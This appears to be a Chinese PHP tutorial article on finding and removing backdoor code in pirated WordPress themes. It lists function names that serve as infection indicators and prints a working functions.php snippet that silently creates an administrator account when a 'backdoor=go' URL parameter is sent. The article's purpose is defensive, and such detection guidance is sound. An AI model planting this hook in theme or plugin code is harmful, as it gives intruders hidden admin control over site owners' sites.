wordpress主题存在后门恶意代码该怎么办?
发布:smiling 来源: PHP粉丝网 添加日期:2014-10-18 09:48:43 浏览: 评论:0
wordpress越来越强大,也伴随着出现越来越多的主题,除了有大量官方的主题,也有许多主题设计者发布收费主题和免费主题,很多不良人收集各种主题回来测试然后添加暗链、广告,甚至恶意代码,然后免费或者收费公开发布出去,诱使别人下载使用,达到不可告人的目的,对不懂代码的童鞋来说,那是致命的.
怎么才知道自己的主题感染了恶意代码呢?
换主题经常出错提示“Fatal error: Cannot redeclare _check_isactive_widget()”、”_get_allwidgetcont” 之类的那么很有可能你已经被感染了,而且在你换主题的时候还会复制恶意代码到你的新主题里去。如果出现了黑链、陌生链接和不明广告,很可能就是主题存在恶意代码!
都去检查一下functions.php文件查一下是否有以下代码,如果你的functions.php中有以下任意一段代码,那么你可能就中招了。
- add_action(“admin_head”,
- add_action(“init”, “_getprepare_widget”);
下面几个是常见的恶意代码:
- _verify_isactivate_widgets
- _check_isactive_widget
- _get_allwidgetscont
- _prepare_widgets
- __popular_posts
新增一段代码开头含有:
_verifyactivate_widgets
_verifyactivate_widget
下面的代码更加狠,可以自动添加一个角色为管理员的用户.
- add_action('wp_head', 'holeinthewall');
- function holeinthewall() {
- If ($_GET['backdoor'] == 'go') {
- require('wp-includes/registration.php');
- If (!username_exists('username')) {
- $user_id = wp_create_user('username', 'password');
- $user = new WP_User($user_id);
- $user->set_role('administrator');
- } //phpfensi.com
- }
- }
将代码添加到您当前主题的 functions.php 文件或插件中,会自动创建一个用户名:username 密码:password的有管理员权限的用户,之后想做什么都可以了,这些恶意代码被添加后,主题看不出任意异常,只有在functions.php检查才能发现,防不胜防!所以大家尽量到官方或原始发布站点下载主题,少用盗版主题和插件以免被开了后门也不知晓.
解决办法:
1、如果是主题本身自带的恶意代码就去原发布地址下载主题重新安装,官方的和原发布地址的百分之90是不会有恶意代码的.
2、如果是感染了恶意代码的找到functions.php 文件用原文件替换掉
3、删除恶意代码,一般就是以上任意一段代码之后的所有代码,这段代码前面还有一个<?PHP,一起删掉.
Tags: wordpress后门 wordpress恶意代码
相关文章
- ·WordPress 防止恶意评论代码处理办法(转义评论内容)(2015-03-24)
推荐文章
热门文章
最新评论文章
- 写给考虑创业的年轻程序员(10)
- PHP新手上路(一)(7)
- 惹恼程序员的十件事(5)
- PHP邮件发送例子,已测试成功(5)
- 致初学者:PHP比ASP优秀的七个理由(4)
- PHP会被淘汰吗?(4)
- PHP新手上路(四)(4)
- 如何去学习PHP?(2)
- 简单入门级php分页代码(2)
- php中邮箱email 电话等格式的验证(2)